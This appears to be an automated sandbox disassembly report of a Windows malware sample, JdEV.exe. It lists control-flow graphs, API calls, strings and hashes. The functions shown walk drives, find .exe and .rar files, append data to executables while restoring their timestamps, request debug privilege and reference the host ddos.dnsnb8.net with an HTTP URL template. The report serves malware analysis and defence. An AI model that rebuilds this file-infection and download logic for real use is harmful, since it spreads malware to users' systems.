                                                                  • API String ID: 2087232378-0
                                                                  • Opcode ID: befe38daa446406007b36d3a10d604dd75ec4d6ca2ff8d7c95c6f865a07f8c4c
                                                                  • Instruction ID: f2a2b51b1a770ba3386c2195134c9eaa089ab8abdaf4bdbf8d0dce9e60f87fc0
                                                                  • Opcode Fuzzy Hash: befe38daa446406007b36d3a10d604dd75ec4d6ca2ff8d7c95c6f865a07f8c4c
                                                                  • Instruction Fuzzy Hash: 8F0234B25087859FDB328F24CC46BEA3BE4EF13310F1945ADD8868F692D674B901CB56

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 366 342b8c-342bc6 memset GetLogicalDriveStringsA 367 342bc8-342bcc 366->367 368 342c09-342c28 WaitForMultipleObjects 366->368 371 342bce-342bd0 367->371 372 342bfa-342c07 lstrlen 367->372 369 342c3c-342c45 368->369 370 342c2a-342c3a CreateThread 368->370 370->369 371->372 373 342bd2-342bdc GetDriveTypeA 371->373 372->367 372->368 373->372 374 342bde-342be1 373->374 374->372 375 342be3-342bf6 CreateThread 374->375 375->372
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00342BA6
                                                                  • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00342BB4
                                                                  • GetDriveTypeA.KERNEL32(?), ref: 00342BD3
                                                                  • CreateThread.KERNEL32(00000000,00000000,00342B7D,?,00000000,00000000), ref: 00342BEE
                                                                  • lstrlen.KERNEL32(?), ref: 00342BFB
                                                                  • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00342C16
                                                                  • CreateThread.KERNEL32(00000000,00000000,00342845,00000000,00000000,00000000), ref: 00342C3A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                                  • Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_340000_JdEV.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                                                  • String ID:
                                                                  • API String ID: 1073171358-0
                                                                  • Opcode ID: 51f6b7e8a061a14b589348c6a8a384f4367e9b5e6fdb640d3acd9145da4fc681
                                                                  • Instruction ID: 9c978bb304b0e8a1ab12508f4d6d97005c5dd6724f6b5b0320dfd20b96fcce96
                                                                  • Opcode Fuzzy Hash: 51f6b7e8a061a14b589348c6a8a384f4367e9b5e6fdb640d3acd9145da4fc681
                                                                  • Instruction Fuzzy Hash: 4A21D8B580014CAFE7229F64AC84DAF7BADFB05344F560125F942EB151D730AD46CB60

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 341e6e-341e95 call 342d60 3 341e97 call 341d8a 0->3 4 341e9c-341eaa call 341df6 0->4 3->4 8 341eb0-341ed9 SetFileAttributesA CreateFileA 4->8 9 342332 4->9 8->9 10 341edf-341f28 call 341915 SetFilePointer CreateFileMappingA MapViewOfFile 8->10 11 342338-34233b 9->11 10->9 18 341f2e-341f39 10->18 13 342346-342349 11->13 14 34233d-342340 UnmapViewOfFile 11->14 16 342350-342354 13->16 17 34234b-34234e CloseHandle 13->17 14->13 19 342356-34235b CloseHandle 16->19 20 342391-34239a call 342d9b 16->20 17->16 18->9 22 341f3f-341f56 18->22 19->20 22->9 24 341f5c-341f64 22->24 24->9 25 341f6a-341f70 24->25 25->9 26 341f76-341f87 call 341c81 25->26 26->9 29 341f8d-341fa7 call 34185b call 341c81 26->29 29->9 34 341fad-341fb4 29->34 35 342024-342045 34->35 36 341fb6-341fc5 call 341af9 34->36 35->9 37 34204b-34204e 35->37 36->35 44 341fc7-341fd2 36->44 39 342070-3420f4 call 341af9 * 2 call 341c68 * 2 memset * 2 37->39 40 342050-342053 37->40 62 3420f5-3420fe 39->62 42 342056-34205a 40->42 42->39 45 34205c-342061 42->45 44->9 47 341fd8-341fe7 44->47 45->9 48 342067-34206e 45->48 50 341fef-342006 call 341af9 47->50 51 341fe9-341fec 47->51 48->42 57 342013-34201e FlushViewOfFile 50->57 58 342008-34200e call 341c68 50->58 51->50 57->35 58->57 63 342130-342139 62->63 64 342100-342114 62->64 67 34213c-342142 63->67 65 342116-34212a 64->65 66 34212d-34212e 64->66 65->66 66->62 68 342144-342150 67->68 69 34215c 67->69 70 342157-34215a 68->70 71 342152-342154 68->71 72 34215f-342162 69->72 70->67 71->70 73 342164-342171 72->73 74 342181-342184 72->74 75 342177-34217e 73->75 76 34232a-34232d 73->76 77 342186 74->77 78 34218d-3421ba call 341c68 74->78 75->74 76->72 77->78 81 3421d3-34220b call 341c81 call 341c68 78->81 82 3421bc-3421d0 call 341c68 78->82 89 34220d-342218 call 341c68 81->89 90 34221b-34221e 81->90 82->81 89->90 92 342226-342328 memcpy UnmapViewOfFile CloseHandle call 341b8a call 34185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call 341915 CloseHandle 90->92 93 342220-342223 90->93 92->11 93->92
                                                                  APIs
                                                                  • SetFileAttributesA.KERNEL32(?,00000080,?,003432B0,00000164,00342986,?), ref: 00341EB9
                                                                  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00341ECD
                                                                  • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00341EF3
                                                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00341F07
                                                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00341F1D
                                                                  • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0034201E
                                                                  • memset.MSVCRT ref: 003420D8
                                                                  • memset.MSVCRT ref: 003420EA
                                                                  • memcpy.MSVCRT(?,?,00000028,?,?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0034222D
                                                                  • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00342238
                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0034224A
                                                                  • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003422C6
                                                                  • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003422CB
                                                                  • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003422DD
                                                                  • WriteFile.KERNEL32(000000FF,00344008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 003422F7
                                                                  • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0034230D
                                                                  • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00342322
                                                                  • UnmapViewOfFile.KERNEL32(?,?,003432B0,00000164,00342986,?), ref: 00342340
                                                                  • CloseHandle.KERNEL32(?,?,003432B0,00000164,00342986,?), ref: 0034234E
                                                                  • CloseHandle.KERNEL32(000000FF,?,003432B0,00000164,00342986,?), ref: 00342359
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                                  • Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_340000_JdEV.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
                                                                  • String ID: .@4$5@4$<@4$C@4$m@4
                                                                  • API String ID: 3043204753-457535175
                                                                  • Opcode ID: 41bda05a1cac72fece6cd858fc095ecb3d2e0ca889ab0a64eca4a6a622548ae8
                                                                  • Instruction ID: b05e2c09a4686985973d7dcc7a1140e0e5e1089a0323f055062ebf1246059c2f
                                                                  • Opcode Fuzzy Hash: 41bda05a1cac72fece6cd858fc095ecb3d2e0ca889ab0a64eca4a6a622548ae8
                                                                  • Instruction Fuzzy Hash: 0EF12575900608AFCB22DFA4DC81AAEBBF5FF09314F504529E51AAB661DB30AD81CF50

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 117 341973-34199a PathFileExistsA 118 341ac7-341acc 117->118 119 3419a0-3419aa 117->119 121 341ad0-341ad5 118->121 122 341ace 118->122 120 3419af-3419c2 CreateFileA 119->120 125 3419c4-3419d3 Sleep 120->125 126 341a28-341a36 GetFileSize 120->126 123 341ad7-341ad9 121->123 124 341af0-341af6 121->124 122->121 123->124 125->120 127 3419d5-341a0b call 34185b wsprintfA CopyFileA 125->127 128 341a87-341a8b 126->128 129 341a38-341a3b 126->129 127->126 143 341a0d-341a26 CreateFileA 127->143 130 341a96-341a9a 128->130 131 341a8d-341a90 CloseHandle 128->131 129->128 133 341a3d-341a51 VirtualAlloc 129->133 135 341a9c 130->135 136 341aad-341ab1 130->136 131->130 133->128 134 341a53-341a57 133->134 138 341a80 134->138 139 341a59-341a6d ReadFile 134->139 140 341aa0-341aa7 DeleteFileA 135->140 141 341ab3-341ab6 136->141 142 341adb-341ae0 136->142 138->128 139->128 144 341a6f-341a7e 139->144 140->136 141->118 147 341ab8-341ac1 VirtualFree 141->147 145 341ae7-341aec 142->145 146 341ae2-341ae5 142->146 143->126 148 341a9e 143->148 144->138 144->139 145->124 149 341aee 145->149 146->145 147->118 148->140 149->124
                                                                  APIs
                                                                  • PathFileExistsA.SHLWAPI(\N4`N4,00000000,C:\Users\user\AppData\Local\Temp\JdEV.exe), ref: 00341992
                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 003419BA
                                                                  • Sleep.KERNEL32(00000064), ref: 003419C6
                                                                  • wsprintfA.USER32 ref: 003419EC
                                                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 00341A00
                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00341A1E
                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 00341A2C
                                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00341A46
                                                                  • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00341A65
                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00341A90
                                                                  • DeleteFileA.KERNEL32(?), ref: 00341AA7
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00341AC1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                                  • Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_340000_JdEV.jbxd
                                                                  Similarity
                                                                  • API ID: File$CreateVirtual$AllocCloseCopyDeleteExistsFreeHandlePathReadSizeSleepwsprintf
                                                                  • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\JdEV.exe$\N4`N4
                                                                  • API String ID: 716042067-841651916
                                                                  • Opcode ID: f16c821d2f10734eb796ed691029c169d1555f98213a280ed5674320a68b3db7
                                                                  • Instruction ID: 494750a81520f2545a9d3840dcdeba589a8d918a2fa69aae4b4d1c6bcd35f6ec
                                                                  • Opcode Fuzzy Hash: f16c821d2f10734eb796ed691029c169d1555f98213a280ed5674320a68b3db7
                                                                  • Instruction Fuzzy Hash: 5D514D71901619EFCB229F98CC84AAEBBFDFB05354F114569F516EB190D770AE80CB50

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 150 3428b8-3428ff memset wsprintfA 151 342905-34290d 150->151 152 3429db-3429df 150->152 151->152 153 342913-342919 151->153 154 342956-342965 strrchr 153->154 155 34291b-34294c memset wsprintfA call 3429e2 153->155 154->152 157 342967-342978 lstrcmpiA 154->157 158 342951 155->158 159 342988-342992 lstrcmpiA 157->159 160 34297a-342981 call 341e6e 157->160 158->152 159->152 161 342994-34299b 159->161 165 342986 160->165 163 3429ad-3429c9 strstr 161->163 164 34299d-3429a3 161->164 167 3429d3-3429d6 call 342692 163->167 168 3429cb-3429d1 call 34239d 163->168 164->163 166 3429a5-3429a7 lstrcpy 164->166 165->152 166->163 167->152 168->152
                                                                  APIs
                                                                  • memset.MSVCRT ref: 003428D3
                                                                  • wsprintfA.USER32 ref: 003428F7
                                                                  • memset.MSVCRT ref: 00342925
                                                                  • wsprintfA.USER32 ref: 00342940
                                                                    • Part of subcall function 003429E2: memset.MSVCRT ref: 00342A02
                                                                    • Part of subcall function 003429E2: wsprintfA.USER32 ref: 00342A1A
                                                                    • Part of subcall function 003429E2: memset.MSVCRT ref: 00342A44
                                                                    • Part of subcall function 003429E2: lstrlen.KERNEL32(?), ref: 00342A54
                                                                    • Part of subcall function 003429E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00342A6C
                                                                    • Part of subcall function 003429E2: strrchr.MSVCRT ref: 00342A7C
                                                                    • Part of subcall function 003429E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00342A9F
                                                                    • Part of subcall function 003429E2: lstrlen.KERNEL32(Documents and Settings), ref: 00342AAE
                                                                    • Part of subcall function 003429E2: memset.MSVCRT ref: 00342AC6
                                                                    • Part of subcall function 003429E2: memset.MSVCRT ref: 00342ADA
                                                                    • Part of subcall function 003429E2: FindFirstFileA.KERNEL32(?,?), ref: 00342AEF
                                                                    • Part of subcall function 003429E2: memset.MSVCRT ref: 00342B13
                                                                  • strrchr.MSVCRT ref: 00342959
                                                                  • lstrcmpiA.KERNEL32(00000001,exe), ref: 00342974
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                                  • Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_340000_JdEV.jbxd
                                                                  Similarity
                                                                  • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                                                  • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                                                  • API String ID: 3004273771-2519171390
                                                                  • Opcode ID: 7a62eacbf34abf5e908075936c7154866a0030dbe06ae172bd1d2db995f264a2
                                                                  • Instruction ID: e77b1c9869b0b7e08bf3ba63c06e1415196727778aabeb6c126a7db36d4e61bc
                                                                  • Opcode Fuzzy Hash: 7a62eacbf34abf5e908075936c7154866a0030dbe06ae172bd1d2db995f264a2
                                                                  • Instruction Fuzzy Hash: 9031B37694030C6BDB22AB65DC85FDB77EC9B11310F450852F545BF080EBB4BAD48BA0

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0034164F
                                                                  • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0034165B
                                                                  • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\JdEV.exe,00000104), ref: 0034166E
                                                                  • CreateThread.KERNEL32(00000000,00000000,00341099,00000000,00000000,00000000), ref: 003416AC
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 003416BD
                                                                    • Part of subcall function 0034139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\JdEV.exe), ref: 003413BC
                                                                    • Part of subcall function 0034139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 003413DA
                                                                    • Part of subcall function 0034139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00341448
                                                                  • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\JdEV.exe), ref: 003416E5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                                  • Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_340000_JdEV.jbxd
                                                                  Similarity
                                                                  • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\JdEV.exe$C:\Windows\system32$Documents and Settings
                                                                  • API String ID: 123563730-2942585238
                                                                  • Opcode ID: 52e81485765f91a35627d120551749e404d6446fd8f1712fca1b51bafff7d04a
                                                                  • Instruction ID: 6f0f92f50abcc92f96898f6fae6bd4598bb096544242fda5c4efa8aef6aed411
                                                                  • Opcode Fuzzy Hash: 52e81485765f91a35627d120551749e404d6446fd8f1712fca1b51bafff7d04a
                                                                  • Instruction Fuzzy Hash: 2B11B9755415147BCB2367A49D4EFDB3EEDEF57361F110121F20A9E060DA74B980CBA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 205 341000-341023 CreateFileA 206 341025-341055 GetFileSize CreateFileMappingA MapViewOfFile 205->206 207 341092-341096 205->207 208 341057-34105f 206->208 209 34107b-341085 206->209 212 341074-341075 UnmapViewOfFile 208->212 213 341061-34106e call 3417d0 208->213 210 341087-34108b CloseHandle 209->210 211 34108d-341091 CloseHandle 209->211 210->211 211->207 212->209 213->212
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HG4,http://%s:%d/%s/%s,003410E8,?), ref: 00341018
                                                                  • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76078400), ref: 00341029
                                                                  • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00341038
                                                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0034104B
                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 00341075
                                                                  • CloseHandle.KERNEL32(?), ref: 0034108B
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0034108E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                                  • Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_340000_JdEV.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                                                  • String ID: HG4$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                  • API String ID: 1223616889-2794644801
                                                                  • Opcode ID: af1dc2269f4fb30e9b30037a54ff6a57669a46e84c2b19147f47fa97e168fd62
                                                                  • Instruction ID: 3166e457e6c2c4bf10af9e463e5afaa30940e56b01208f2244c89bf06c8c939f
                                                                  • Opcode Fuzzy Hash: af1dc2269f4fb30e9b30037a54ff6a57669a46e84c2b19147f47fa97e168fd62
                                                                  • Instruction Fuzzy Hash: B30196B510075CBFE7325F609C88E2BBBECEB45799F014629F245AB090DA706E848B71

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 385 3414e1-3414fb 386 341541-341547 385->386 387 3414fd-341510 GetModuleHandleA 385->387 390 341573-341574 call 341638 386->390 391 341549-34154c 386->391 388 341512-341518 387->388 389 34151a-341535 VirtualQuery 387->389 388->386 392 341537-341539 389->392 393 34153b 389->393 398 341579-34157a ExitProcess 390->398 394 34154e-341555 391->394 395 341569-341570 391->395 392->386 392->393 393->386 394->395 397 341557-341566 call 341af9 394->397 397->395
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00341504
                                                                  • VirtualQuery.KERNEL32(003414E1,?,0000001C), ref: 00341525
                                                                  • ExitProcess.KERNEL32 ref: 0034157A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                                  • Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_340000_JdEV.jbxd
                                                                  Similarity
                                                                  • API ID: ExitHandleModuleProcessQueryVirtual
                                                                  • String ID:
                                                                  • API String ID: 3946701194-0
                                                                  • Opcode ID: 88646c6fbbc275910f99db63b9b83a5d89ea099a346dc44b5343b8a7273f39f8
                                                                  • Instruction ID: 37179e6301ba95283a001cc85ac3b0dfca59d260b54c4a7cf2f93041eaf09864
                                                                  • Opcode Fuzzy Hash: 88646c6fbbc275910f99db63b9b83a5d89ea099a346dc44b5343b8a7273f39f8
                                                                  • Instruction Fuzzy Hash: FE118C79D00614DFCB23DFA6A8817B977ECEB83750F01403AE412DE121DB30B980AB50

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 401 341915-341922 402 341924-341926 401->402 403 341928-34192c 401->403 404 34196e-341970 402->404 405 34192e-34194d memset GetFileTime 403->405 406 34194f-341952 403->406 407 341966-341968 405->407 406->404 408 341954-341960 SetFileTime 406->408 409 34196c 407->409 410 34196a 407->410 408->407 409->404 410->409
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.1613253825.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                                  • Associated: 00000003.00000002.1613233553.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613291177.0000000000344000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000003.00000002.1613308995.0000000000346000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_340000_JdEV.jbxd
                                                                  Similarity
                                                                  • API ID: FileTimememset
                                                                  • String ID:
                                                                  • API String ID: 176422537-0
                                                                  • Opcode ID: d2f0ee894e2422bc9189d36ae5088c9ac0ba12959b7e9ad192ee108aec6415bb
                                                                  • Instruction ID: cc4d8639d67bca3fd62f75b484dc91791133da14b563fff92ffd18b152c7c96d
                                                                  • Opcode Fuzzy Hash: d2f0ee894e2422bc9189d36ae5088c9ac0ba12959b7e9ad192ee108aec6415bb
                                                                  • Instruction Fuzzy Hash: FCF06836210609ABD722DE26DC04BAB77ECEB51361F118536F516DA460E730F685DBF0